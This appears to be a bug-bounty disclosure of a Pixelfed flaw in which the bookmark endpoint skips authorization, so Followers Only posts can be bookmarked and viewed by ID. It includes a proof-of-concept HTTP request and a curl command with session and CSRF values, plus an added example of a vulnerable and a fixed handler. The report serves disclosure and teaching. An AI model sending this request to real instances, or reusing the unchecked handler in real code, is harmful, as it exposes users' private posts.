An attacker can view private posts in pixelfed/pixelfed
Valid
Reported on
Jan 18th 2023
Description
The bookmark saving functionality performs an improper authorization check: a post is bookmarked by ID without verifying that the requesting user is allowed to view it.
To exploit this, an attacker needs to know the target post ID. This can be obtained via a share link or (less plausibly) by brute-forcing.
Proof of Concept
- [victim] Create a new post whose visibility is Followers Only. In this case the post ID is 521204147650984455.
- [attacker] Send the following request:
POST /i/bookmark HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 27
Referer: http://localhost/i/web/post/521154091471578587
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: 5DyUM2DySl5UvQmaCgxNTxjLz9G1MlCFCqmZTclf
Cookie: pxfs=eyJpdiI6InF6TXJScWF6NGxkN1hCMkhkNEhBZHc9PSIsInZhbHVlIjoiMEdzKzZVS3c2WUFWS0lKblZTVzliVXlrSUVEMExJUDN2eXduQnc2TzdvVGFTcnpNdlZKSk1Ka2gxeEJwWG1ZZ1Y1K2ljUnc2aHc4bVIvRlQ0MC9xRmIzMTBESFNmaHNTemkxeGR2bnpYanZ5aW5TVE4xMHQ0ZCtydFBuVHJOQ2kiLCJtYWMiOiI4OWY1ZjQ2NjA4Y2FiNWU0MTM1MWVjNjI0MDk0YjU3OWNiNGJjYmRiM2I2NTc4OWRkZWE1OGU2YWI3NmM4ZjI0IiwidGFnIjoiIn0%3D;
{"item":521204147650984455}
Equivalent command:
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'Content-Type: application/json' -H $'Content-Length: 27' -H $'Referer: http://localhost/i/web/post/521154091471578587' -H $'X-Requested-With: XMLHttpRequest' -H $'X-CSRF-TOKEN: 5DyUM2DySl5UvQmaCgxNTxjLz9G1MlCFCqmZTclf' \
-b $'pxfs=eyJpdiI6InF6TXJScWF6NGxkN1hCMkhkNEhBZHc9PSIsInZhbHVlIjoiMEdzKzZVS3c2WUFWS0lKblZTVzliVXlrSUVEMExJUDN2eXduQnc2TzdvVGFTcnpNdlZKSk1Ka2gxeEJwWG1ZZ1Y1K2ljUnc2aHc4bVIvRlQ0MC9xRmIzMTBESFNmaHNTemkxeGR2bnpYanZ5aW5TVE4xMHQ0ZCtydFBuVHJOQ2kiLCJtYWMiOiI4OWY1ZjQ2NjA4Y2FiNWU0MTM1MWVjNjI0MDk0YjU3OWNiNGJjYmRiM2I2NTc4OWRkZWE1OGU2YWI3NmM4ZjI0IiwidGFnIjoiIn0%3D' \
--data-binary $'{\"item\":521204147650984455}' \
$'http://localhost/i/bookmark'
- [attacker] Go to My Bookmarks and see that the post created in step 1 is listed there and can be viewed.
Impact
An attacker who knows the post ID can bookmark, and thereby view, a Followers Only post without following its author.
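To make the missing check concrete, the following is an added example (not Pixelfed's code; the Post model, visibility values and follow relation are simplified assumptions chosen for illustration) that puts a bookmark handler with the flaw described above beside a hardened version that enforces the post's visibility before saving. The scenario mirrors the report: the victim (user 1) publishes a Followers Only post, the attacker (user 2) knows its ID but does not follow the author, and user 3 is an accepted follower.

```python
"""Illustrative model of the authorization check missing from a bookmark
endpoint.  Added example code, not Pixelfed's implementation: the data model
below is a constructed simplification, not Pixelfed's schema."""
from dataclasses import dataclass, field
from enum import Enum


class Visibility(Enum):
    PUBLIC = "public"
    UNLISTED = "unlisted"
    PRIVATE = "private"  # "Followers Only" in the report's terms


@dataclass
class Post:
    id: int
    author_id: int
    visibility: Visibility


@dataclass
class Store:
    """Constructed in-memory state standing in for the database."""
    posts: dict = field(default_factory=dict)
    follows: set = field(default_factory=set)    # (follower_id, followed_id)
    bookmarks: set = field(default_factory=set)  # (user_id, post_id)


def can_view(store, viewer_id, post):
    """Visibility rule: public/unlisted posts are viewable by anyone;
    followers-only posts only by the author and accepted followers."""
    if post.visibility in (Visibility.PUBLIC, Visibility.UNLISTED):
        return True
    if viewer_id == post.author_id:
        return True
    return (viewer_id, post.author_id) in store.follows


def bookmark_vulnerable(store, user_id, post_id):
    """Pattern described in the report: the post is looked up by ID and
    bookmarked without checking that the requester may see it."""
    post = store.posts.get(post_id)
    if post is None:
        return 404
    store.bookmarks.add((user_id, post_id))
    return 200


def bookmark_fixed(store, user_id, post_id):
    """Hardened variant: enforce the post's visibility before saving.
    Answering 404 (not 403) for posts the user may not see avoids confirming
    that a guessed ID exists."""
    post = store.posts.get(post_id)
    if post is None or not can_view(store, user_id, post):
        return 404
    store.bookmarks.add((user_id, post_id))
    return 200


POST_ID = 521204147650984455  # post ID quoted in the report


def make_store():
    """Fresh constructed scenario: user 1 owns a followers-only post,
    user 3 follows user 1, user 2 follows nobody."""
    return Store(
        posts={POST_ID: Post(POST_ID, author_id=1, visibility=Visibility.PRIVATE)},
        follows={(3, 1)},
    )


def demo():
    """Run the attacker's request against both handlers and report the
    status codes and whether a bookmark row was created for the attacker."""
    vuln_store = make_store()
    fixed_store = make_store()
    results = {
        "vulnerable_attacker": bookmark_vulnerable(vuln_store, 2, POST_ID),
        "fixed_attacker": bookmark_fixed(fixed_store, 2, POST_ID),
        "fixed_follower": bookmark_fixed(fixed_store, 3, POST_ID),
        "fixed_author": bookmark_fixed(fixed_store, 1, POST_ID),
        "vulnerable_store_has_attacker_bookmark": (2, POST_ID) in vuln_store.bookmarks,
        "fixed_store_has_attacker_bookmark": (2, POST_ID) in fixed_store.bookmarks,
    }
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the example is that the visibility rule already exists for rendering a post; the defect is that a secondary write path (bookmarking) reached the post by ID without going through the same rule. Any endpoint that accepts a post ID and later surfaces that post to the caller (bookmarks, collections, likes with an "items I liked" view) needs the identical check, applied at the time of the write.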
We are processing your report and will contact the pixelfed team within 24 hours.
We have contacted a member of the pixelfed team and are waiting to hear back.
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 19th 2023